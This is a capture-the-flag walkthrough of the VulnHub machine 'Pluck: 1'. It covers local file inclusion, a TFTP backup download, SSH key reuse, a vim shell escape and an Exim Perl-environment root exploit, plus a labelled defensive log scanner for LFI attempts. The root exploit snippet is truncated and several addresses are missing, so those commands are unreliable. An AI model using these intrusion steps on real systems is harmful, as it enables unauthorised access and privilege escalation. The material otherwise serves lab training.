Pluck: 1 CTF Walkthrough

June 8, 2017 by Chiragh Dewan

Pluck: 1 is a vulnerable machine created by Ryan Oberto. It surfaced on VulnHub on 11th March 2017. It can be downloaded from,178/

The file can be used with VMWare as well as VirtualBox. The machine is Linux based.

The objective is to read the flag present in the machine with root privileges.

Once downloaded and fired up, it presents a login screen which shows the target IP:

Since we have our target IP, let’s scan and see what we can find:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are three ports open:

  • Port 22 – Used for SSH
  • Port 80 – Used to serve a web application
  • Port 3306 – Running MySQL

Seeing that port 80 is open, my first instinct was to check what the server is running:

The way the URL was formed prompted me to test for LFI (Local File Inclusion), and it worked:

Looking at the output, it talks about a user called backup-user whose job is to take periodic backups and store them. Let’s see what it shows us:
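From the defender's side, file-inclusion probing like this leaves a clear trail in the web server's access log. The following is an added example, not part of the original walkthrough, that decodes each query-string value and flags those resolving to directory traversal or an absolute system path; the log lines, the `page` parameter name and the client addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (common log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jun/2017:10:01:02 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 1420
203.0.113.7 - - [08/Jun/2017:10:01:09 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1893
203.0.113.7 - - [08/Jun/2017:10:01:15 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 310
203.0.113.7 - - [08/Jun/2017:10:01:21 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1893
198.51.100.4 - - [08/Jun/2017:10:02:00 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1893
198.51.100.4 - - [08/Jun/2017:10:02:10 +0000] "GET /img/logo.png?v=1.2 HTTP/1.1" 200 5000
"""

# Client IP, request target and status code from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A ".." path segment, or an absolute path into a system directory.
SUSPICIOUS = re.compile(r'(^|/)\.\.(/|$)|^/(etc|proc|var|home|usr|root)/')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lfi_attempts(log_text):
    """Return (client_ip, parameter, decoded_value, status) per suspicious value."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        ip, target, status = match.groups()
        # parse_qsl decodes once; fully_decode handles any further layers.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = fully_decode(value).replace("\\", "/")
            if SUSPICIOUS.search(value):
                hits.append((ip, name, value, int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit answered with status 200 is the case to triage first, since the server returned content for a path the application should never serve.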

To get the backup.tar file, I connected with TFTP (Trivial File Transfer Protocol) and downloaded it:

$ tftp

tftp> connect

tftp> get backup.tar

tftp> quit

On extracting the contents of backup.tar, we see there are two folders:

  • Home
  • Var

$ tar -xvf backup.tar

On further examination, we see that the user paul has a few keys up his sleeve:

Let’s try to use them and see if any of them works. After trying a few, id_key4 showed the following:

$ ssh -i id_key4 paul@

Here, we are presented with pdmenu. To get to a shell, go on to Edit file and enter any file name. You will be presented with vim, and to exit to a shell, simply write:

:set shell=/bin/bash

and then type :shell to exit to a shell.

Checking about the user and the system, we find:

Now to read the flag, we need to get root privilege. After doing some research, I found the following exploit ( Simply copying and pasting the following, gave us root:

cat > /tmp/ << EOF

package root;

use strict;

use warnings;



PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

and voila, we have the flag:
